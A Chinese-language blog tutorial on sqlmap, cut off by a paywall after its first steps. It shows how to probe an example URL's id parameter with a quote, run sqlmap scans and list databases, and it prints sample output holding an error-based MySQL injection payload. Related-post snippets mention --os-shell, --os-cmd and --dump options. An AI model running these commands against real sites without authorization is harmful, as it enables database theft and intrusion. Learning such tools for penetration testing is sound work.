sqlmap详细教程

已于 2023-01-27 20:22:01 修改
阅读量3.1k 收藏 20
点赞数 3
文章标签: sql linux 数据库 网络 安全
于 2023-01-04 15:42:06 首次发布
Neatsuki-king
本文链接:https://blog.csdn.net/m0_54471074/article/details/128548328
版权

目录

前言

我最近在学习 sqlmap , 我学完之后之后,觉得还是把这些都写清楚,方便 SQL map 的初学者。

一、sqlmap

Sqlmap是最流行和最强大的SQL注入自动化工具之一。给定易受攻击的http请求url,sqlmap可以利用远程数据库并进行大量黑客攻击,例如提取数据库名称,表,列,表中的所有数据等。
在某些情况下,它甚至可以在远程文件系统上读取和写入文件。用python编写,它是目前最强大的黑客工具之一。Sqlmap是SQL注入的代言。

Sqlmap包含在渗透测试Linux发行版中,如kali linux,backtrack,backbox等。在其他发行版上,只需从以下网址下载即可

http://sqlmap.org/

由于它是用python编写的,首先你必须在你的系统上安装python。在 ubuntu 上从 synaptic 安装 python。在Windows上安装activestate python。,

在本教程中,我们将学习如何使用 SQL map 来利用易受攻击的 Web 应用程序,并看看使用这样的工具可以完成所有操作。

要理解本教程,您应该对数据库驱动的 Web 应用程序的工作原理有透彻的了解。例如那些用php+mysql制作的。

二、易受攻击的网址

假设有一个 Web 应用程序或网站包含这样的 URL

http://www.site.com/section.php?id=51

并且它很容易出现 SQL 注入,因为该站点的开发人员没有正确转义参数 ID。这可以通过尝试打开 URL 来简单地进行测试

http://www.site.com/section.php?id=51'

我们只是在参数中添加了一个单引号。如果此 URL 抛出错误或以意外方式做出反应,那么很明显数据库得到了应用程序未正确转义的意外单引号。因此,在这种情况下,此输入参数“id”容易受到SQL注入的影响。

三、使用 SQL map 进行黑客攻击

现在是时候继续使用 SQL map 来破解这些 URL 了。sqlmap 命令使用 python 解释器从终端运行。

1. 扫描远程系统

第一个命令是扫描远程系统以查看其是否容易受到 SQL 注入的影响,然后收集有关它的信息。

python sqlmap.py -u "http://www.site.com/section.php?id=51"

以上是使用 SQL map 工具运行的第一个也是最简单的命令。它检查输入参数以查找它们是否容易受到 SQL 注入的影响。为此,sqlmap 将不同类型的 SQL 注入有效负载发送到输入参数并检查输出。

[*] starting at 12:10:33
[12:10:33] [INFO] resuming back-end DBMS 'mysql'
[12:10:34] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=51 AND (SELECT 1489 FROM(SELECT COUNT(*),CONCAT(0x3a73776c3a,(SELECT (CASE WHEN (1489=1489) THEN 1 ELSE 0 END)),0x3a7a76653a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[12:10:37] [INFO] the back-end DBMS is MySQL
web server operating system: FreeBSD
web application technology: Apache 2.2.22
back-end DBMS: MySQL 5

因此,sqlmap工具已经发现了操作系统,Web服务器和数据库以及版本信息。即使这么多也令人印象深刻。但是现在是时候继续前进了,看看这个工具还能做什么。

2. 发现数据库

一旦 SQL map 确认远程 URL 容易受到 SQL 注入的攻击并且可被利用,下一步就是找出远程系统上存在的数据库的名称。 “–dbs”选项用于获取数据库列表。

python sqlmap.py -u "http://www.sitemap.com/section.php?id=51" --dbs

输出可能是这样的


                

                
                
        

        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  「已注销」
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                    3
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    20
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
                
  • 
                  
                    打赏
                    
                  
                  
    打赏
    
                
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                  1
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      










                



	

		

			

				
					
sqlmqp源码

				
			

			

				

					01-11
				

			

		

		

			
				
sqlmap 的源码,这是我在学习sqlmap的时候看的,现在分享给大家

			
		

	



                

              
                



	

		

			

				
					
sqlmap 使用笔记(kali环境)

				
			

			

				

					qq_40691438的博客
				

				

					02-10
					
					1716
					
				

			

		

		

			
				
sqlmap默认把session文件跟结果文件保存在output文件夹下,用此参数可自定义输出路径 例如:–当请求是HTTPS的时候,需要配合–force-ssl参数来使用,或者可以在Host头后面加上:443。在有些时候web服务器使用了伪静态,导致无法直接使用sqlmap测试参数,可以在想测试的参数后面加*用–os-shell参数也可以模拟一个真实的shell,可以输入你想执行的命令。输出的格式可定义为:CSV,HTML,SQLITE。参数:–os-cmd,–os-shell。文件内容直接copy。

			
		

	



                


  
              

                


	

		

			

				
					
SQLmap使用教程图文教程(超详细

					
最新发布

				
			

			

				

					2401_84969692的博客
				

				

					05-13
					
					909
					
				

			

		

		

			
				
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!

			
		

	





	

		

			

				
					
sqlmap使用教程

				
			

			

				

					hmysn的博客
				

				

					07-27
					
					1万+
					
				

			

		

		

			
				
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。

			
		

	



		

			
		



	

		

			

				
					
sqlmap详细使用教程

				
			

			

				

					m0_55854679的博客
				

				

					12-28
					
					9287
					
				

			

		

		

			
				
文章目录简介SQL注入流程命令参数拓展
简介

Sqlmap是一个自动化检测和利用SQL注入漏洞的免费开源工具,对SQL注入漏洞进行检测的最佳工具



支持对多种数据库进行注入测试,能够自动识别数据库类型并注入


支持多种注入技术,并且能够自动探测使用合适的注入技术
如:布尔盲注、时间盲注、联合查询注入、报错注入、堆查询注入


能够爆破数据库信息,如用户名,密码


能够自动识别哈希密码,并且使用密码字典进行破解.


SQL注入

原理:SQL注入攻击指的是用户输入了特殊的数据拼接到原本程序的代码中

			
		

	





	

		

			

				
					
Sqlmap 使用方法小结

					
热门推荐

				
			

			

				

					0verWatch的博客
				

				

					08-02
					
					2万+
					
				

			

		

		

			
				
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西

--is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa)
--dbs 所有数据库
--current-db 网站当前数据库
--users 所有数据库用户
--current-user 当前数据库用户
--random-age...

			
		

	





	

		

			

				
					
渗透测试工具sqlmap基础教程.docx

				
			

			

				

					10-25
				

			

		

		

			
				
渗透测试工具sqlmap基础教程  sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。本文旨在帮助渗透测试的小白入门,介绍sqlmap的...

			
		

	





	

		

			

				
					
Mac电脑安装sqlmap及环境配置.docx

				
			

			

				

					05-13
				

			

		

		

			
				
Mac 电脑安装 sqlmap 及环境配置  在本文中,我们将介绍如何在 Mac 电脑上安装 sqlmap 并进行环境配置。sqlmap 是一个开源的渗透测试工具,能够自动检测和exploit SQL 注入漏洞。  安装 sqlmap  首先,我们需要从 ...

			
		

	





	

		

			

				
					
Windows下Sqlmap环境安装教程详解

				
			

			

				

					09-16
				

			

		

		

			
				
主要介绍了Windows下Sqlmap环境安装,本文通过图文并茂的形式给大家介绍的非常详细,对大家的学习或工作具有一定的参考借鉴价值,需要的朋友可以参考下

			
		

	





	

		

			

				
					
SqlMap的使用

				
			

			

				

					06-24
				

			

		

		

			
				
本文档详细介绍了SqlMap的使用教程SQL注入攻击是黑客对数据库进行攻击的常用手段之一

			
		

	





	

		

			

				
					
ibatis-sqlMap-入门教程(代码)

				
			

			

				

					10-22
				

			

		

		

			
				
3. **SQL映射文件(sqlMap)**:详细解释`sqlMap`文件的结构,包括`<select>`, `<insert>`, `<update>`, `<delete>`标签的用法,以及如何编写动态SQL。  4. **Java对象与数据表映射**:展示如何定义Java POJO(Plain...

			
		

	





	

		

			

				
					
详细SQLMap使用攻略及技巧

				
			

			

				

					喜欢Python编程的程序员柚柚呀
				

				

					12-20
					
					4889
					
				

			

		

		

			
				
sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。sqlmap支持五种不同的注入模式:l  基于布尔的盲注,即可以根据返回页面判断条件真假的注入;l  基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;

			
		

	





	

		

			

				
					
kali linux里利用SQLmap实现SQL注入

				
			

			

				

					2201_76034619的博客
				

				

					06-28
					
					5853
					
				

			

		

		

			
				
安全等级调为low进入SQL Injection(Blind)页面。

			
		

	





	

		

			

				
					
史上最详细sqlmap入门教程

				
			

			

				

					weixin_44867191的博客
				

				

					05-16
					
					1万+
					
				

			

		

		

			
				
最近做安全测试,遇到了SQL盲注的漏洞,从发现漏洞,确认漏洞,协助开发复现漏洞,验证漏洞一整套流程下来,有了亿点点收获,下面分享给大家,希望对软件测试同学有所启发,难度不大,小白看完也能上手的那种。

			
		

	





	

		

			

				
					
Kali linux SQLmap注入攻击实验简略操作

				
			

			

				

					Dream_chang的博客
				

				

					05-18
					
					5451
					
				

			

		

		

			
				
1.环境需求

kali linux虚拟机(本人2021.2版本)

Windows2008R2 已经部署的dvwa服务器

2.实验部分

先启动两台虚拟机,并且启动Windows2008R2上部署的phpstudy服务,作为kalisql注入攻击的服务器预备。

(1)打开kali上的Burp suite和在火狐浏览器上输入之前部署的DVWA,然后登陆进去,选择dvwa security


...

			
		

	





	

		

			

				
					
使用Sqlmap对目标站点进行渗透攻击

				
			

			

				

					weixin_53897304的博客
				

				

					06-13
					
					1851
					
				

			

		

		

			
				
掌握Kali Linux中的Sqlmap各类功能及参数配置
技能目标:使用Sqlmap对目标站点进行渗透攻击


			
		

	





	

		

			

				
					
kali工具sqlmap的使用教程

				
			

			

				

					qq_52805176的博客
				

				

					07-13
					
					3743
					
				

			

		

		

			
				
渗透测试工具sqlmap的简单使用

			
		

	





	

		

			

				
					
SQL map的基本用法

				
			

			

				

					qq_44720671的博客
				

				

					04-08
					
					1万+
					
				

			

		

		

			
				
SQL map的基本用法(初步入门)
sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。
首先,我们需要检测注入点是否可用
我以墨者学院的靶场为例:

这里的公告就是一个合适的注入点
(检测注入点需要利用其他工具)


我们可以利用手工注入的方式,但有些费时,因此我们可以使用SQL map等工具来...

			
		

	





	

		

			

				
					
sqlmap安装教程ubuntu

				
			

			

				

					08-15
				

			

		

		

			
				
可以按照以下步骤在Ubuntu上安装Sqlmap:

1. 打开终端。
2. 使用以下命令安装Sqlmap的依赖项:
   ```
   sudo apt install python3 python3-pip
   sudo pip3 install requests
   sudo apt install git
   ```
3. 使用以下命令克隆Sqlmap存储库:
   ```
   git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
   ```
4. 进入Sqlmap目录:
   ```
   cd sqlmap-dev
   ```
5. 现在你可以使用Sqlmap了,可以运行以下命令获取帮助信息:
   ```
   python3 sqlmap.py --help
   ```

这样就完成了在Ubuntu上安装Sqlmap的过程。请注意,使用Sqlmap进行任何活动都需要合法的授权和明确的目的。<span class="em">1</span><span class="em">2</span><span class="em">3</span>
#### 引用[.reference_title]
-  *1* [记录Ubuntu下的一些渗透测试工具安装](https://blog.csdn.net/qq_36334464/article/details/128596365)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
-  *2* *3* [sqlmap详细教程](https://blog.csdn.net/m0_54471074/article/details/128548328)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"]
[ .reference_list ]

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		
评论 1

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  





	
打赏作者

	

		

		
			
		
		

		

			
「已注销」

			
你的鼓励将是我创作的最大动力

		

	

	

			

	

	

    ¥1
    ¥2
    ¥4
    ¥6
    ¥10
    ¥20
	

	

		

			

				

					扫码支付:¥1
				

				

					

					
					获取中
					

				

				

					
					
					扫码支付
				

			

		

		

			
您的余额不足,请更换扫码支付或充值

			
打赏作者

		

	



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值